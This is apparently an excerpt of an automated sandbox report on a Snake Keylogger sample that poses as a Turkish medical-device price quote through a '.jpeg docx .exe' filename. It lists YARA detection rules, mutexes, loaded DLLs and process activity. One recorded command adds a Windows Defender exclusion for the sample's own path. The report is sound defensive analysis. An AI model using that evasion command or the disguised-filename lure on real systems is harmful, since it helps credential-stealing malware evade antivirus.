                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000001.00000002.2243855683.0000000002ABB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4690289376.0000000006B59000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe, 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeBinary or memory string: OriginalFilenamecOXk.exeJ vs fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 6.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000006.00000002.4681612879.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000001.00000002.2248030461.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 7120, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe PID: 1088, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, --B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3c1d090.2.raw.unpack, --B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, U--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, --B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3bda670.1.raw.unpack, --B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, b8dtrgGm05KjZYhK3t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, PorFhk6DERu52uuEWI.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, PorFhk6DERu52uuEWI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, PorFhk6DERu52uuEWI.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3cb2138.0.raw.unpack, b8dtrgGm05KjZYhK3t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, PorFhk6DERu52uuEWI.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, PorFhk6DERu52uuEWI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, PorFhk6DERu52uuEWI.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.3b13228.3.raw.unpack, b8dtrgGm05KjZYhK3t.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, PorFhk6DERu52uuEWI.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, PorFhk6DERu52uuEWI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe.7e20000.5.raw.unpack, PorFhk6DERu52uuEWI.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/5@4/4
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMutant created: \Sessions\1\BaseNamedObjects\oXmyoBHEZzdrJeh
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5172:120:WilError_03
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_htklcr3n.qvc.ps1Jump to behavior
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeProcess created: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe "C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exe"Jump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeSection loaded: uxtheme.dllJump to behavior
